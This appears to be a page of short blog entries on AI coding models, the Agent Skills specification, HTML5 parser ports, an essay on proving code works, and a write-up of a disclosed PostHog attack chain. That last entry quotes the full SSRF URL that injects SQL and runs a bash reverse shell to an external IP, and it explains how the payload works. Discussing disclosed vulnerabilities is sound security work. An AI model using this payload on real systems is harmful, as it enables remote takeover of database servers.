2025-12-19 13:21:17
The latest in OpenAI's Codex family of models (not the same thing as their Codex CLI or Codex Cloud coding agent tools).
GPT‑5.2-Codex is a version of GPT‑5.2 further optimized for agentic coding in Codex, including improvements on long-horizon work through context compaction, stronger performance on large code changes like refactors and migrations, improved performance in Windows environments, and significantly stronger cybersecurity capabilities.
As with some previous Codex models, this one is available via their Codex coding agents now and will be coming to the API "in the coming weeks". Unlike previous models, there's also a new invite-only preview process that gives vetted cybersecurity professionals access to "more permissive models".
I've been very impressed recently with GPT-5.2's ability to tackle multi-hour agentic coding challenges. GPT-5.2-Codex scores 64% on the Terminal-Bench 2.0 benchmark, up from GPT-5.2's 62.2%. I'm not sure how noticeable that 1.8 point improvement will be in practice!
I didn't hack API access together this time (see previous attempts), instead opting to just ask Codex CLI to "Generate an SVG of a pelican riding a bicycle" while running the new model (effort medium). Here's the transcript in my new Codex CLI timeline viewer, and here's the pelican it drew:

Tags: ai, openai, generative-ai, llms, pelican-riding-a-bicycle, llm-release, codex-cli, gpt-codex
2025-12-19 09:09:18
Anthropic have turned their skills mechanism into an "open standard", which I guess means it lives in an independent agentskills/agentskills GitHub repository now? I wouldn't be surprised to see this end up in the AAIF, recently the new home of the MCP specification.
The specification itself lives at agentskills.io/specification, published from docs/specification.mdx in the repo.
It is a deliciously tiny specification - you can read the entire thing in just a few minutes. It's also quite heavily under-specified - for example, there's a metadata field described like this:
Clients can use this to store additional properties not defined by the Agent Skills spec
We recommend making your key names reasonably unique to avoid accidental conflicts
And an allowed-tools field:
Experimental. Support for this field may vary between agent implementations
Example:
allowed-tools: Bash(git:*) Bash(jq:*) Read
The Agent Skills homepage promotes adoption by OpenCode, Cursor, Amp, Letta, goose, GitHub, and VS Code. Notably absent is OpenAI, who are quietly tinkering with skills but don't appear to have formally announced their support just yet.
Tags: ai, generative-ai, llms, anthropic, ai-agents, coding-agents, skills
2025-12-19 07:57:58
First there was Emil Stenström's JustHTML in Python, then my justjshtml in JavaScript, then Anil Madhavapeddy's html5rw in OCaml, and now Kyle Howells has built a vibespiled dependency-free HTML5 parser for Swift using the same coding agent tricks against the html5lib-tests test suite.
Kyle ran some benchmarks to compare the different implementations:
- Rust (html5ever) total parse time: 303 ms
- Swift total parse time: 1313 ms
- JavaScript total parse time: 1035 ms
- Python total parse time: 4189 ms
Tags: html5, ai, generative-ai, llms, ai-assisted-programming, vibe-coding, swift
2025-12-18 22:49:38
In all of the debates about the value of AI-assistance in software development there's one depressing anecdote that I keep on seeing: the junior engineer, empowered by some class of LLM tool, who deposits giant, untested PRs on their coworkers - or open source maintainers - and expects the "code review" process to handle the rest.
This is rude, a waste of other people's time, and honestly a dereliction of duty as a software developer.
Your job is to deliver code you have proven to work.
As software engineers we don't just crank out code - in fact these days you could argue that's what the LLMs are for. We need to deliver code that works - and we need to include proof that it works as well. Not doing that directly shifts the burden of the actual work to whoever is expected to review our code.
There are two steps to proving a piece of code works. Neither is optional.
The first is manual testing. If you haven't seen the code do the right thing yourself, that code doesn't work. If it does turn out to work, that's honestly just pure chance.
Manual testing skills are genuine skills that you need to develop. You need to be able to get the system into an initial state that demonstrates your change, then exercise the change, then check and demonstrate that it has the desired effect.
If possible I like to reduce these steps to a sequence of terminal commands which I can paste, along with their output, into a comment in the code review. Here's a recent example.
Some changes are harder to demonstrate. It's still your job to demonstrate them! Record a screen capture video and add that to the PR. Show your reviewers that the change you made actually works.
Once you've tested the happy path where everything works you can start trying the edge cases. Manual testing is a skill, and finding the things that break is the next level of that skill that helps define a senior engineer.
The second step in proving a change works is automated testing. This is so much easier now that we have LLM tooling, which means there's no excuse at all for skipping this step.
Your contribution should bundle the change with an automated test that proves the change works. That test should fail if you revert the implementation.
The process for writing a test mirrors that of manual testing: get the system into an initial known state, exercise the change, assert that it worked correctly. Integrating a test harness to productively facilitate this is another key skill worth investing in.
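As a minimal sketch of that shape in Python, here's a pytest-style test against a hypothetical slugify() helper - the function, its module and its behaviour are illustrative assumptions, not taken from any particular project:

# Hypothetical example of the arrange / act / assert shape
from myproject.text import slugify  # assumed helper, for illustration only

def test_slugify_collapses_whitespace():
    # Arrange: get the system into a known initial state
    title = "  Hello   World  "
    # Act: exercise the change
    result = slugify(title)
    # Assert: prove it worked - reverting the implementation should fail this
    assert result == "hello-world"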
Don't be tempted to skip the manual test because you think the automated test has you covered already! Almost every time I've done this myself I've quickly regretted it.
The most important trend in LLMs in 2025 has been the explosive growth of coding agents - tools like Claude Code and Codex CLI that can actively execute the code they are working on to check that it works and further iterate on any problems.
To master these tools you need to learn how to get them to prove their changes work as well.
This looks exactly the same as the process I described above: they need to be able to manually test their changes as they work, and they need to be able to build automated tests that guarantee the change will continue to work in the future.
Since they're robots, automated tests and manual tests are effectively the same thing.
They do feel a little different though. When I'm working on CLI tools I'll usually teach Claude Code how to run them itself so it can do one-off tests, even though the eventual automated tests will use a system like Click's CliRunner.
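For anyone who hasn't used it, here's roughly what a CliRunner-based test looks like - the hello command is a made-up example, not from a real project:

# Hypothetical Click command plus a CliRunner test for it
import click
from click.testing import CliRunner

@click.command()
@click.option("--name", default="world")
def hello(name):
    click.echo(f"Hello, {name}!")

def test_hello():
    # Invoke the command in-process and capture its output
    runner = CliRunner()
    result = runner.invoke(hello, ["--name", "pelican"])
    assert result.exit_code == 0
    assert result.output == "Hello, pelican!\n"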
When working on CSS changes I'll often encourage my coding agent to take screenshots when it needs to check if the change it made had the desired effect.
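Playwright is one way an agent might capture that kind of screenshot - this is just a sketch, and the URL and output filename are assumptions for illustration:

# Minimal Playwright sketch: load a page and save a screenshot to inspect a CSS change
from playwright.sync_api import sync_playwright

with sync_playwright() as p:
    browser = p.chromium.launch()
    page = browser.new_page(viewport={"width": 1280, "height": 800})
    page.goto("http://localhost:8000/")  # assumed local development server
    page.screenshot(path="after-css-change.png", full_page=True)
    browser.close()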
The good news about automated tests is that coding agents need very little encouragement to write them. If your project has tests already most agents will extend that test suite without you even telling them to do so. They'll also reuse patterns from existing tests, so keeping your test code well organized and populated with patterns you like is a great way to help your agent build testing code to your taste.
Developing good taste in testing code is another of those skills that differentiates a senior engineer.
A computer can never be held accountable. That's your job as the human in the loop.
Almost anyone can prompt an LLM to generate a thousand-line patch and submit it for code review. That's no longer valuable. What's valuable is contributing code that is proven to work.
Next time you submit a PR, make sure you've included your evidence that it works as it should.
Tags: programming, careers, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, coding-agents
2025-12-18 09:42:22
Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.
The way in abuses a webhooks system with weak URL validation, setting up an SSRF (Server-Side Request Forgery) attack where the server is tricked into making a request against an internal network resource.
Here's the URL that gets injected:
http://clickhouse:8123/?query=SELECT+*+FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT+*+FROM+cmd_exec;+--\",'posthog','posthog')#
Reformatted a little for readability:
http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
'db:5432',
'posthog',
"posthog_use')) TO STDOUT;
END;
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec (
cmd_output text
);
COPY cmd_exec
FROM PROGRAM $$
bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"
$$;
SELECT * FROM cmd_exec;
--",
'posthog',
'posthog'
)
#
This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in that function (since fixed). The injected query then abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.
The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.
Via Hacker News
Tags: postgresql, security, webhooks, clickhouse
2025-12-18 07:23:35
AoAH Day 15: Porting a complete HTML5 parser and browser test suite
Anil Madhavapeddy is running an Advent of Agentic Humps this year, building a new useful OCaml library every day for most of December. Inspired by Emil Stenström's JustHTML and my own coding agent port of that to JavaScript, he coined the term vibespiling for AI-powered porting and transpiling of code from one language to another, and had a go at building an HTML5 parser in OCaml. The result is html5rw, which passes the same html5lib-tests suite that Emil and I used for our projects.
Anil's thoughts on the copyright and ethical aspects of this are worth quoting in full:
The question of copyright and licensing is difficult. I definitely did some editing by hand, and a fair bit of prompting that resulted in targeted code edits, but the vast amount of architectural logic came from JustHTML. So I opted to make the LICENSE a joint one with Emil Stenström. I did not follow the transitive dependency through to the Rust one, which I probably should.
I'm also extremely uncertain about ever releasing this library to the central opam repository, especially as there are excellent HTML5 parsers already available. I haven't checked if those pass the HTML5 test suite, because this is wandering into the agents vs humans territory that I ruled out in my groundrules. Whether or not this agentic code is better or not is a moot point if releasing it drives away the human maintainers who are the source of creativity in the code!
I decided to credit Emil in the same way for my own vibespiled project.
Via @avsm
Tags: definitions, functional-programming, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, ocaml